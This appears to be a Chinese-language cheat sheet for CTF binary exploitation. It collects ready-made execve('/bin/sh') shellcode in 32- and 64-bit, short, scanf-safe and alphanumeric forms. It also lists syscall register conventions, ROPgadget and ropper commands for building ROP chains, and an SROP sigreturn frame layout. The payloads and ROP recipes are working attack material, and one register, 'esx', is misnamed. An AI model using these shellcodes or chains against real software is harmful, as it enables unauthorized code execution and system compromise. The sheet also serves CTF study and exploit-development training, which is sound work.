shellcode:
    32位 短字节shellcode --> 21字节
        \x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
    32位 纯ascii字符shellcode
        PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
    32位 scanf可读取的shellcode
        \xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh
    64位 scanf可读取的shellcode 22字节
        \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
    64位 较短的shellcode  23字节
        \x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
    64位 纯ascii字符shellcode
        Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t


函数返回值
    64位:rax
    32位:eax
函数传参
    32位
    eax = 0xb       // execve系统调用号
    ebx = /bin/sh   // 第一个参数
    ecx = 0         // 第二个参数
    edx = 0         // 第三个参数
    esx = 0         // 第四个参数
    edi = 0         // 第五个参数
    64位
    rax = 0x3B      // execve系统调用号
    rdi = /bin/sh   // 第一个参数
    rsi = 0         // 第二个参数
    rdx = 0         // 第三个参数
    rcx = 0         // 第四个参数
    r8  = 0         // 第五个参数
    r9  = 0         // 第六个参数



ROPgadget:
    ROPgadget --binary filename --only 'pop|ret'
    ROPgadget --binary filename --string '/bin/sh'
    ROPgadget --binary filename --ropchain



ropper
    ropper --file xxxx --search "int 0x80"
    ropper
    file filename
    search int 0x80



Signal Frame
    Frame = SigreturnFrame() # 设置恢复的寄存器
    0x00  rt_sigreturn          uc_flags
    0x10  &uc                   uc_stack.ss_sp
    0x20  uc_stack.ss_flags     uc_stack.ss_size
    0x30  r8                    r9
    0x40  r10                   r11
    0x50  r12                   r13
    0x60  r14                   r15
    0x70  rdi                   rsi
    0x80  rbp                   rbx
    0x90  rdx                   rax
    0xA0  rcx                   rsp
    0xB0  rip                   eflags
    0xC0  cs/gs/fs              err
    0xD0  trapno                oldmask(unused)
    0xE0  cr2(segfault addr)    &fpstate
    0xF0  __reserved            sigmask



寻找系统调用号
    constants.SYS_read
    constants.SYS_write
    ...

